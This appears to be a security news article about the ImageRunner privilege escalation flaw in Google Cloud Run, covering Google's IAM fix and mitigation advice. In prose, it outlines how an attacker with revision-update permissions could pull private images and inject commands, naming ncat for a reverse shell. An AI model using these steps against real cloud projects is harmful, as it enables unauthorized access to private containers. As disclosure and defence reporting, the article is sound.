The ImageRunner vulnerability in Google Cloud Platform (GCP), discovered by a Researcher, exposed a critical privilege escalation flaw in Google Cloud Run. Attackers with edit permissions on Cloud Run revisions (run.services.update and iam.serviceAccounts.actAs) could exploit this flaw to access private container images stored in Google Artifact Registry and Google Container Registry, even without explicit registry permissions. The vulnerability stemmed from how Cloud Run handled permissions during deployments, where a service agent with elevated privileges pulled container images. This flaw allowed attackers to bypass security controls and access sensitive cloud resources.

To exploit ImageRunner, an attacker needed control over an identity with the required permissions, allowing them to update a Cloud Run service, create a new revision, and specify any private container image. By injecting malicious commands, such as using “ncat” to establish a reverse shell, they could gain unauthorized access to containers. The attack leveraged the service agent’s inherited permissions, effectively "borrowing" its privileges to pull private images. This issue highlighted the broader risks of cloud services relying on interconnected dependencies, which Researcher, described as the “Jenga®” security model, where a weakness in one layer threatens the entire structure.

Google remediated the vulnerability by enforcing stricter IAM policies, requiring that any principal updating or creating Cloud Run services must explicitly have access to the container images being deployed. As part of the fix, principals now need the Artifact Registry Reader (roles/artifactregistry.reader) role on the repository or project containing the images. The patch was fully rolled out on January 28, 2025, with prior notifications sent to affected users in November 2024, ensuring organizations could prepare for the changes.

To mitigate future risks, organizations using GCP should adopt the principle of least privilege for IAM permissions, ensuring that only authorized identities can perform Cloud Run deployments. Security teams should monitor Cloud Run revision updates for unusual activity and implement additional security controls around container deployments. ImageRunner serves as a crucial reminder that cloud security requires continuous vigilance, as privilege escalation vulnerabilities can emerge in complex multi-service architectures, posing serious threats to sensitive cloud environments.